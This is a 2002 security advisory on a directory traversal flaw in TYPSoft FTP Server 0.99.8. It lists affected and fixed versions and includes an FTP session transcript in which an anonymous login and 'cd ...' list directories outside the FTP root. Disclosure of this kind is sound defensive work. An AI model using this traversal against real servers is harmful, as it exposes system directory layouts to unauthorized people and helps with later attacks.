TYPSoft FTP Server Directory Traversal Vulnerability
17 Dec. 2002
Summary
Marc Bergeron's TYPSoft multilingual Windows-based FTP server supports standard FTP commands, virtual file system architecture, transfer resumes, IP restrictions and logging. A vulnerability in the product allows remote attackers to cause the server to traverse into directories that reside outside the bounding FTP root directory.
Credit:
The information has been provided by iDEFENSE Labs, the vulnerability was discovered by Tamer Sahin.
Vulnerable systems:
* TYPSoft FTP Server version 0.99.8
Immune systems:
* TYPSoft FTP Server version 0.99.13
TYPSoft's failure to filter out "." sequences in URL requests allows remote users to break out of restricted directories and gain read access to the system directory structure; arbitrary file retrieval is not possible, however.
The following transcript demonstrates a sample exploitation of the vulnerability:
C:\>ftp 10.20.30.40
Connected to 10.20.30.40.
220 TYPSoft FTP Server 0.99.8 ready...
User (10.20.30.40:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
.
..
226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd /
250 CWD command successful. "/C:/Inetpub/ftproot/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
.
..
226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd ..
550 'C:\Inetpub\ftproot\Inetpub\': no such file or directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
.
..
226 Transfer complete.
ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
ftp> cd ...
250 CWD command successful. "/C:/Inetpub/ftproot/.../" is current
directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
.
..
AdminScripts
ftproot
iissamples
mailroot
Scripts
webpub
wwwroot
226 Transfer complete.
ftp: 78 bytes received in 0.01Seconds 7.80Kbytes/sec.
ftp> bye
221 Goodbye!
Analysis:
Any remote user with legitimate or anonymous access to an affected TYPSoft FTP server can exploit the vulnerability and freely browse the target system's directory structure. Such information could prove useful in subsequent attacks as well as provide information useful for an attacker to successfully conduct social engineering attacks.
Detection:
TYPSoft FTP Server 0.99.8 is vulnerable to the above-described attack. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, experiment by following the above transcript.
